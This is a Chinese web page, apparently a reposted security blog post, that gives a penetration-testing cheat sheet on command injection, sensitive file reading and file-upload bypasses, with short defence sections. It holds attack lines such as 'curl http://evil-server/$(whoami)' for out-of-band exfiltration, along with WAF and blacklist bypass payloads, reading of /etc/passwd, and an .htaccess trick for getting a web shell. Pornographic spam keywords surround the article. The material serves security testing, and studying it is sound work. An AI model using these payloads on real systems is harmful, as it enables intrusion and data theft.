亚洲欧洲久久av_极品美女国产精品免费一区_老司机网站免费_免费视频入口_人妻网站成熟人妻VA网站_福利视频网站

網站命令執行滲透測試步驟詳情
  • 更新時間:2025-04-21 18:32:38
  • 開發經驗
  • 發布時間:3年前
  • 718

哈嘍大家好,近期我們Sine安全對客戶平臺進行滲透測試的時候,發現有一些命令執行的漏洞測試語句和函數,導致服務器被提權被入侵,上一節提到XSS跨站腳本攻擊檢測方法,本章來總和一下腳本執行命令的詳細檢測手段,以及繞過waf的辦法,只有這樣詳細的對平臺進行安全測試才能保障整個平臺安全穩定。


3.5.1. 簡介

命令注入通常因為指Web應用在服務器上拼接系統命令而造成的漏洞。

該類漏洞通常出現在調用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主機名/IP/掩碼/網關、查看系統信息以及關閉重啟等功能,或者一些站點提供如ping、nslookup、提供發送郵件、轉換圖片等功能都可能出現該類漏洞。


3.5.2. 常見危險函數

3.5.2.1. PHP

system

exec

passthru

shell_exec

popen

proc_open

3.5.2.2. Python

system

popen

subprocess.call

spawn

3.5.2.3. Java

java.lang.Runtime.getRuntime().exec(command)

3.5.3. 常見注入方式

分號分割

|| && & 分割

| 管道符

\r\n %d0%a0 換行

反引號解析

$() 替換

3.5.4. 無回顯技巧

bash反彈shell

DNS帶外數據

http帶外

curl http://evil-server/$(whoami)

wget http://evil-server/$(whoami)

無帶外時利用 sleep 或其他邏輯構造布爾條件

3.5.5. 常見繞過方式

3.5.5.1. 空格繞過

< 符號 cat<123

\t / %09

${IFS} 其中{}用來截斷,比如cat$IFS2會被認為IFS2是變量名。另外,在后面加個$可以起到截斷的作用,一般用$9,因為$9是當前系統shell進程的第九個參數的持有者,它始終為空字符串

3.5.5.2. 黑名單繞過

a=l;b=s;$a$b

echo "bHM=" | -d

/?in/?s => /bin/ls

連接符 cat /etc/pass'w'd

未定義的初始化變量 cat$x /etc/passwd

3.5.5.3. 長度限制繞過

>wget\

>foo.\

>com

ls -t>a

sh a

上面的方法為通過命令行重定向寫入命令,接著通過ls按時間排序把命令寫入文件,最后執行 直接在Linux終端下執行的話,創建文件需要在重定向符號之前添加命令 這里可以使用一些諸如w,[之類的短命令,(使用ls /usr/bin/?查看) 如果不添加命令,需要Ctrl+D才能結束,這樣就等于標準輸入流的重定向 而在php中 , 使用 shell_exec 等執行系統命令的函數的時候 , 是不存在標準輸入流的,所以可以直接創建文件

3.5.6. 常用符號

3.5.6.1. 命令分隔符

%0a / %0d / \n / \r

;

& / &&

3.5.6.2. 通配符

* 0到無窮個任意字符

? 一個任意字符

[ ] 一個在括號內的字符,e.g. [abcd]

[ - ] 在編碼順序內的所有字符

[^ ] 一個不在括號內的字符

3.5.7. 防御

不使用時禁用相應函數

盡量不要執行外部的應用程序或命令

做輸入的格式檢查

轉義命令中的所有shell元字符

shell元字符包括 #&;`,|*?~<>^()[]{}$\

3.6. 文件讀取

3.6. 文件讀取

考慮讀取可能有敏感信息的文件

用戶目錄下的敏感文件

.bash_history

.zsh_history

.profile

.bashrc

.gitconfig

.viminfo

passwd

應用的配置文件

/etc/apache2/apache2.conf

/etc/nginx/nginx.conf

應用的日志文件

/var/log/apache2/access.log

/var/log/nginx/access.log

站點目錄下的敏感文件

.svn/entries

.git/HEAD

WEB-INF/web.xml

.htaccess

特殊的備份文件

.swp

.swo

.bak

index.php~

Python的Cache

__pycache__\__init__.cpython-35.pyc

3.7. 文件上傳

3.7.1. 文件類型檢測繞過

3.7.1.1. 更改請求繞過

有的站點僅僅在前端檢測了文件類型,這種類型的檢測可以直接修改網絡請求繞過。同樣的,有的站點在后端僅檢查了HTTP Header中的信息,比如 Content-Type 等,這種檢查同樣可以通過修改網絡請求繞過。


3.7.1.2. Magic檢測繞過

有的站點使用文件頭來檢測文件類型,這種檢查可以在Shell前加入對應的字節以繞過檢查。幾種常見的文件類型的頭字節如下表所示


3.7.1.3. 后綴繞過

部分服務僅根據后綴、上傳時的信息或Magic Header來判斷文件類型,此時可以繞過。

php由于歷史原因,部分解釋器可能支持符合正則 /ph(p[2-7]?|t(ml)?)/ 的后綴,如 php / php5 / pht / phtml / shtml / pwml / phtm 等 可在禁止上傳php文件時測試該類型。

jsp引擎則可能會解析 jspx / jspf / jspa / jsw / jsv / jtml 等后綴,asp支持 asa / asax / cer / cdx / aspx / ascx / ashx / asmx / asp{80-90} 等后綴。

除了這些繞過,其他的后綴同樣可能帶來問題,如 vbs / asis / sh / reg / cgi / exe / dll / com / bat / pl / cfc / cfm / ini 等。


3.7.1.4. 系統命名繞過

在Windows系統中,上傳 index.php. 會重命名為 . ,可以繞過后綴檢查。也可嘗試

index.php%20, index.php:1.jpg index.php::$DATA 等。在Linux系統中,可以嘗試上傳名為 index.php/. 或 ./aa/../index.php/. 的文件


3.7.1.5. .user.ini

在php執行的過程中,除了主 php.ini 之外,PHP 還會在每個目錄下掃描 INI 文件,從被執行的 PHP 文件所在目錄開始一直上升到 web 根目錄($_SERVER[‘DOCUMENT_ROOT’] 所指定的)。如果被執行的 PHP 文件在 web 根目錄之外,則只掃描該目錄。.user.ini 中可以定義除了PHP_INI_SYSTEM以外的模式的選項,故可以使用 .user.ini 加上非php后綴的文件構造一個shell,比如 auto_prepend_file=01.gif 。


3.7.1.6. WAF繞過

有的waf在編寫過程中考慮到性能原因,只處理一部分數據,這時可以通過加入大量垃圾數據來繞過其處理函數。

另外,Waf和Web系統對 boundary 的處理不一致,可以使用錯誤的 boundary 來完成繞過。


3.7.1.7. 競爭上傳繞過

有的服務器采用了先保存,再刪除不合法文件的方式,在這種服務器中,可以反復上傳一個會生成Web Shell的文件并嘗試訪問,多次之后即可獲得Shell。


3.7.2. 攻擊技巧

3.7.2.1. Apache重寫GetShell

Apache可根據是否允許重定向考慮上傳.htaccess

內容為

AddType application/x-httpd-php .png php_flag engine 1

就可以用png或者其他后綴的文件做php腳本了


3.7.2.2. 軟鏈接任意讀文件

上傳的壓縮包文件會被解壓的文件時,可以考慮上傳含符號鏈接的文件 若服務器沒有做好防護,可實現任意文件讀取的效果,如果覺得防護做的不到位 不放心的話,可以找專業的網站安全公司來處理解決,畢竟術業有專攻,國內做的比較好的公司如:Sinesafe,綠盟,啟明星辰等等。


3.7.3. 防護技巧

使用白名單限制上傳文件的類型

使用更嚴格的文件類型檢查方式

限制Web Server對上傳文件夾的解析

我們專注高端建站,小程序開發、軟件系統定制開發、BUG修復、物聯網開發、各類API接口對接開發等。十余年開發經驗,每一個項目承諾做到滿意為止,多一次對比,一定讓您多一份收獲!

本文章出于推來客官網,轉載請表明原文地址:https://www.tlkjt.com/experience/7583.html
推薦文章

在線客服

掃碼聯系客服

3985758

回到頂部

主站蜘蛛池模板: 亚洲一区二区日韩_欧美黑人又大又粗XXXXX_免费久久精品视频_黄色免费看片_好好的日在线视频观看_特级无码毛片免费视频尤物_成人亚洲一区二区一_欧美交换配乱吟粗大 | 青青草免费在线播放_国产黄色录像片_狠狠插网站_国产嫖妓一区二区三区无码_免费无码作爱视频_综合色91_成年女人粗暴毛片免费观看_456影院在线播放精品 | 看片免费黄在线观看入口_成年男人的天堂_国产熟妇的荡欲午夜视频_www.av小次郎_五月色丁香综缴合_年轻母亲4在线_懂色av色吟av夜夜嗨_国产伦理久久精品久久久久 | 97在线观看永久免费视频_日本韩国欧美在线_国产成人毛片_冲田杏梨AV一区二区三区_夜夜操天天操_久久精品三级视频_蜜桃传免费看片www_2021亚洲韩国精品乱码 | 艳母1-6在线播放_日韩精品一区二区久久_青青久草在线_三个男人躁我一个爽公交车上_国产在线欧美日韩精品一区_性国产丰满麻豆videosex_91亚洲影院_狠狠色综合色区 | 男同GAY毛片免费可播放_欧美黄色性视频_精品色999_av无限看_激情天堂网_久久精品这里热有精品_久久国内偷拍视频_夜夜摸夜夜操 | 久久爽久久爽久久av东京爽_成人日韩精品_脱了老师内裤猛烈进入的软件_欧洲国产精品精华液_国产乱子伦精品无码专区_亚洲一卡二卡三卡四卡无卡网站_蜜桃av在线_97精华最好的产品在线 男ji大巴进入女人的视频免费看_国产精品99久久久久久宅男_国产一区二区三区精品视频_亚洲av无码久久寂寞少妇_国产在线观看影视_a级网站在线观看_欧美黄色片网站_91久久久久久白丝白浆欲热蜜臀 | 精品99久久_国产精品在线看_大香伊蕉最新视频_亚洲色大18成人网站WWW在线播放_一区二区免费视频_国产午夜福利片1000无码_久久精品亚洲人成影院_久草在线手机视频 | 少妇88久久中文字幕_久久a级毛片免费观看_国产成人精品日本亚洲网站_在线观看av一区二区_色悠久久久久久久综合网_国产免费踩踏调教视频_xxxx另类黑人_涩涩婷婷 | 人妻AV无码一区二区三区_99激情网_亚洲第一无码xxxxxx_131美女MM爱做爽爽爽视频_a级毛片高清免费视频在线_久草com_久久久亚洲精品中文字幕_一区二区三区在线不卡 | 国产青草视频在线观看视频_高清videosgr欧美熟妇_国产暴力强伦轩1区二区小说_粉嫩国产一区二区三区免费_亚洲免费成人在线_直接看片的av网址在线看片_日韩熟女精品一区二区三区_www久久 | 国产区亚洲区_黄色在线片_欧美日韩在线看片_欧美日韩偷拍一区_91av国产在线_成年人免费在线看惊悚片动作片_国产萌白酱喷水视频在线观看_少妇无力反抗慢慢张开双腿 | 亚洲成人av一区二区三区_中文字幕在线中文字幕二区_欧美巨大XXXX做受中文字幕_超碰在线久_av永久免费观看_欧美成人精品高清在线观看_一个人免费在线观看动漫视频www_永久不封国产av毛片 | 麻豆蜜桃_欧美黑人巨大久久久精品一区小蓝_久久青草av_成年人xxxx_狠狠躁夜夜躁人人爽天天开心婷婷_午夜一区在线观看_青草网址_小视频在线看 | 日韩大胆视频_亚洲欧美一区二区三区不卡_在线观看日本黄色_久久久久久一区国产精品_欧美黄色激情视频_免费一对一刺激互动聊天软件_粉嫩饱饱鱼一线天在线观看_美女一级a毛片免费观看97 | 好吊妞人成视频在线观看强行_久久国产精品二国产精品_久久不色_A毛片毛片看免费_亚洲综人网_不用播放器看av_奇米影视四色影音先锋_9999视频 | 亚洲国产欧美一区二区三区久久_免费观看色视频_亚洲国产成人精品无色码_日日人人爽人人爽人人片AV_黄色激情网址_欧日韩精品_人妖啪啪综合av一区ts人妖_视频二区无码人妻在线 | 99久久精品免费看国产_50丰满少妇高潮惨叫正在播放_a级黄毛片_日日艹夜夜艹_91看片资源_精品久久久久久久久久中文字幕_四虎av无码专区亚洲av_久久AV色欲AV久久蜜桃麻豆 | 亚洲精品宾馆在线精品酒店_色窝窝色蝌蚪在线视频_麻豆传媒tv_国产9999精品_大地资源第二页中文高清版_国产一级爱_亚洲AV无码国产在丝袜线观看_噜噜噜亚洲色成人网站∨ | 一二三国产视频_91九色网址_动漫精品h_日韩不卡1卡2卡三卡免费网站2021_扒开双腿猛进入喷水高潮叫声_a一级黄色毛片_国产爽视频_久操精品在线观看 | 欧美大码少妇_四面虎影最新播放网址_亚洲av中文无码字幕色本草_一区二区三区四区日韩_国产成人综合亚洲A片激情文学_亚洲欧美黑人猛交群_国产免费av片在线_9.1人网站色 | av国产免费_国产自产V一区二区三区c_国产全黄a一级毛片91_成人免费网站视频_成在线人AV无码高潮喷水_s8在线观看成人网站_欧美真人性做爰一二区_日本免费高清一区 | 亚洲熟妇自偷自拍另欧美_国产精品污www一区二区三区_麻豆综合在线_91视频网入口_亚洲自拍偷拍精品_日韩一卡2卡3卡4卡2021免费观看国色天香_99r在线_亚洲国产天堂久久综合网 | gogo大胆无码免费视频列表_亚洲精品秘在线看_国产成人综合在线女婷五月99播放_日韩一区二区三区四区区区_成年人黄页_国产福利毛片_欧美日韩一区二区三区不卡_日韩无在线 | 欧美一级特黄aaaa_亚洲综合麻豆_人妻日本无中文字幕无码_久久久久毛片_www.伊人久久_老司机精品影院_成全动漫在线观看免费观看_日本亚洲网站 337P大尺度啪啪人体_国产一二三视频_在线亚洲网站_91av一二三区_小鸟酱福利视频_999观看免费高清www_婷婷日日_国产91精品欧美 | 日韩一级成人_日韩美女毛片_美女视频网站久久_亚洲AV最新天堂地址_av免费在线视_无码丰满熟妇juliaann_日本黄色影院在线观看_亚洲热久久 | 特级片日本_国产精品嫩草影院ccm_精品亚洲精品_欧美三级欧美成人高清www_久久国产亚洲精品无码_国产免费一级淫片_4438xx亚洲最大五色丁香_国产亚洲91 | 免费A级毛片无码免费视_日韩一中文字无码不卡_国产精品国语版在线观看_性一交一乱一做一爰_国产精品推荐制服丝袜_99久久网站_另类毛片_亚洲熟妇成人精品一区 | 国产4区_国产成人无精品久久久_第一区在线观看免费国语入口_色999久久久精品人人澡69_观看av在线_亚洲国产精品欧美久久_欧美性精品220_人妻在卧室被老板疯狂进入 | 粉嫩玉足夹茎视频在线看_视频一区国产精品_天天干网_日韩在线综合视频_密桃av_国产一区三_天天干夜夜骑_四虎影视在线观看 | 日本一二区视频_影音先锋中文字幕亚洲资源站_精品国自产在线观看_免费aa大片_国产精品yjizz视频网_在线成人免费av_老师夹震蛋上课出白浆_琪琪秋霞午夜av影院 | 亚洲一区二区精品在线观看_91精品国产综合久久小仙女图片_性欧美freexxxx_精品国产免费久久久久久尖叫_撕开奶罩揉吮奶头好爽_亚洲精品中文幕一区二区_成人wwxx免费观看_国产精品第页 | 久热国产精品视频_波萝蜜A毛黄AAA片_老师掀起裙子让我把j放进去视频_亚洲精品乱码久久久久膏_亚洲欧美一区二区三区_天天躁日日躁狠狠躁aab吃奶_美女又黄又免费视频_日韩无码系列综合区 | 久久不卡免费视频_美女日p_亚洲国产成人久久久_欧美日韩国产有码_九九九九网站_japanese中国丰满成熟_色综合天天综合高清_91久久看片 | 小嫩嫩12欧美_大地资源二中文在线观看官网_大菠萝福利视频_亚洲成人三级在线观看_久久韩日_国产成人女人在线视频观看_欧美精选视频_国产果冻豆传媒麻婆 | 中文字幕不卡免费视频_亚洲欧美日韩另类精品一区_少妇午夜三级伦理影院播放器_亚洲精品乱码久久观看网_久青草无码视频在线观看_在线不卡a资源高清_欧美第2页_亚洲国产成人在线播放 | 午夜在线观看影院_一区二区免费av_黄色录像久久_国产普通话尤物吞精视频_丰满少妇被猛烈进入毛片_毛片在线免费观看网站_我把护士日出水了视频_www.亚洲视频.com | 观看免费av_午夜国产影院_精品精品国产高清a毛片_天天躁夜夜躁狠狠久久成人网_无翼乌之侵犯工口全彩老师_亚洲双插_国产一在线精品一区在线观看_一本大道久久东京热无码av | 亚洲热在线免费观看一二三区_av在线片_亚洲一区二区精品_a级片日本_久久中文字幕av_免费网站看V片在线18禁无码_久久九九有精品国产_欧美视频完全免费看 | 中文字幕日韩精品一区二区_欧美一级久久久猛烈a大片_国产精品免费久久久久久久久久中文_欧美精产国品一二三区_久久a免费视频_亚洲AV永久无码精品天堂动漫_免费精品久久久久久久一区二区_超清AV在线播放不卡无码 | 91沈先生在线观看高清_中文精品一卡2卡3卡4卡国色_麻豆九九九_曰韩无码二三区中文字幕_久久国产精品免费专区_又色又爽又高潮免费视频观看_91狼人社区_无套在线观看 |